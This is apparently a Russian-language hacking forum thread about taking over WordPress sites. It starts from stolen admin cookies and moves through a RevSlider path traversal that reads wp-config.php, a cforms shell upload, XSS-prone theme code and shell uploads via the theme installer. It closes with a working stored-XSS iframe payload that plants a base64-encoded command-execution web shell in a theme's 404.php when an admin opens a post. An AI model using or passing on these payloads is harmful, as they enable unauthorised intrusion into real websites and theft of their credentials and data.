Друзья такой вопрос. Стянул куки админа с сайта на wordpress 2.3.3 Авторизировался под ним, но в админку зайти не могу, так как cтоит http basic авторизация на папку wp-admin. Подскажите, какие могут быть дальнейшие действия?
подскажите кто знает wp-content/plugins/bbpress/ -уязвимость показал впскан что поставить после bbpress/? при простом открытии -пустая страница, если на подобе такого подставить topic.php?id[]=12&replies=3 пишет страница не найдена и ошибка Warning: session_start() [function.session-start]: open(/
to BigBear Этот uploader у тебя как сплойт или работает при имеющимся доступе к админке? И это для привата или гдето сие чудо можно протестить? Для каких версий WP?
Версии с 1.0 по 3.8.6 - специально ставил каждую и переписывал сплойт под англо/ру/ино язычные сайты. В паблике такого не найдёшь. Протестировать нигде. Но в рамках паблик-ачат-тестирования - пару сайтов пробью.
Кто-нибудь может пояснить эту уязвимость - http://1337day.com/exploit/22012 ? В частности Directory Traversal/Arbitrary code execution/Arbitrary File read. Сколько не читал, не проникнусь, что и как делается.
а есть какие нибудь софты для проверки на уязвимость? актуальные и хорошие. так как в наше время вроде уже хрен найдешь с уязвимостью +(
exploit cforms 14.6 shell upload Плагин: cforms 14.6 - последняя версия на сегодня! shell upload оффициальный сайт: При настройках по умолчанию и с формой для заливки файлов, льет: для исключения подобной возможности, в настройках можно указать отдельную папку для заливкии положить в нее .htaccess c запретом выполнения скриптов, или переписать скрипт.
Dork : revslider.php "index of" Wordpress Slider Revolution Responsive <= 4.1.4 чтение файлов http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Аналогично, ковырял так и не понял как лить, а шеллы встречаются довольно часто, находил на забугор форумах описание, о том, что нужно капать в сторону файла: lib_ajax.php, а именно переменную " r " или " rs " где то здесь: PHP: function sajax_handle_client_request() { global $sajax_export_list; $mode = ""; if (! empty($_GET["rs"])) $mode = "get"; if (!empty($_POST["rs"])) $mode = "post"; if (empty($mode)) return; $target = ""; ### 10.02. Added header header ('Content-Type: text/javascript'); header ('X-Content-Type-Options: nosniff'); if ($mode == "get") { ### Bust cache in the head header ("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); ### Date in the past header ("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); ### always modified header ("Cache-Control: no-cache, must-revalidate"); ### HTTP/1.1 header ("Pragma: no-cache"); ### HTTP/1.0 $func_name = ( $_GET["rs"] ); ### 10.2.2012 sajax_sanitize removed if (! empty($_GET["rsargs"])) $args = ( $_GET["rsargs"] ); ### 10.2.2012 sajax_sanitize removed else $args = array(); } else { $func_name = ( $_POST["rs"] ); ### 10.2.2012 sajax_sanitize removed if (! empty($_POST["rsargs"])) $args = ( $_POST["rsargs"] ); ### 10.2.2012 sajax_sanitize removed else $args = array(); }
Уязвимость в шаблонах для WordPress от автора "ronangelo" пасивная XSS его темы можно идентифецировать по файлу readme.txt в корне темы: Примеры уязвимых сайтов: сам уязвимый код: PHP: <?php $content_width = $_GET['content_width']; ?> .mceContentBody {width: <?php echo $content_width; ?>px;} статья, как лить шелл в WP при XSS:
попробуй подставить путь,должно открыть окно загрузки плагинов /wp-admin/update.php?action=upload-plugin
Зайди в установку темы, выбери файл с компа то есть твой шелл (например: shell.php) и загрузи его, выдаст какую то ошибку (всегда по разному), а шелл открывай так: domain/wp-content/uploads/shell.php или domain/wp-content/uploads/2014/10/shell.php в 99% случаях заливается.
не помогло пишет недостаточно прав нету пункта установка тем, могу заливать только медиафайлы Есть у кого еще идеи?
Я так понимаю, что у тебя доступ в админку юзера без админских прав. Скорей всего это редактор. Попробуй сделать следующее: Создай любой пост (по теме блога) и пихни в него код Code: <iframe name='evilframe' src='/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen' style='display:none' onload="if (evilframe.document.getElementById('newcontent').value.indexOf('system') == -1) {evilframe.document.getElementById('newcontent').value += atob('PD9waHAgQHN5c3RlbSgkX0dFVFsnY21kJ10pOyA/Pg=='); evilframe.document.getElementById('submit').click();}"></iframe> twentythirteen - это имя темы, замени его на свою. Теперь после того, как любой авторизованный админ откроет твой пост, то выполниться скрипт и шелл будет залит в файл 404.php (шаблон 404 ошибки) Шелл доступен по адресу http://site.com/?p=123123123&cmd=id